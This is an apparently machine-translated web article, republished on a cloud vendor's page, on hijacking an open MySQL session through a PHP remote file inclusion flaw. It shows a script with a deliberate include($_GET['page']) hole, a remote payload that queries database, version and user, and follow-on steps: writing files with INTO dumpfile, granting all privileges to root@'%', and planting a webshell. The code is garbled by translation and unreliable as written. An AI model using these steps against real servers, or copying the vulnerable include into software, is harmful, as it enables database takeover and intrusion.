MySQL Session Hijacking over RFI

Source: Internet
Author: User

This is caused by the mysql_close function.
 
Reference: http://php.net/manual/en/function.mysql-close.php
 
Mysql_close () closes the non-persistent connection to the MySQL server that's associated with the specified link identifier. If link_identifier isn' t specified, the last opened link is used.
 
Using mysql_close () isn' t usually necessary, as non-persistent open links are automatically closed at the end of the script's execution. See also freeing resources.
 
Generally, mysql_close () is not required, because the opened non-persistent connection is automatically closed after the script is executed.
 
Test: mysql. php
Www.2cto.com
<? Php
$ Host = "localhost ";
$ User = "root ";
$ Pass = "rootpass ";
$ Db = "test ";
// Current
$ Connect = mysql_connect ($ host, $ user, $ pass );
Mysql_select_db ($ db, $ connect );
$ Query = mysql_query ("SELECT uname FROM admin ");
While ($ lol = mysql_fetch_array ($ query )){
Echo "we get it:". $ lol ["uname"]. "<br> ";
}
Include ($ _ GET ["page"]); // SCRIPT HAVE RFI
?> Local:
 
<? Php
$ Edevil = mysql_query ("SELECT concat_ws (0x3a, database (), version (), user ());");
$ A = mysql_fetch_array ($ edevil );
Echo $ a [0];
?> When the URL is submitted, the local code is executed by the remote host.
 
 
 
When programmers write code, they always like to connect to database files separately and include them when other files are involved, such as include ("dbtabase. php ");
 
If a PHP file is included in the penetration test and the database is included, we can operate its database. Maybe we can do something else, for example: SELECT 'Hello world' INTO dumpfile'/tmp/test.txt ',
Or: grant all privileges on *. * TO 'root' @ '%' identified by 'pass' with grant option;
Of course it's much better to directly include a Webshell.
Refer:
MySQL Session Hijacking over RFI
Http://www.dis9.com/wp-content/uploads/2012/03/mysql.txt
 

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.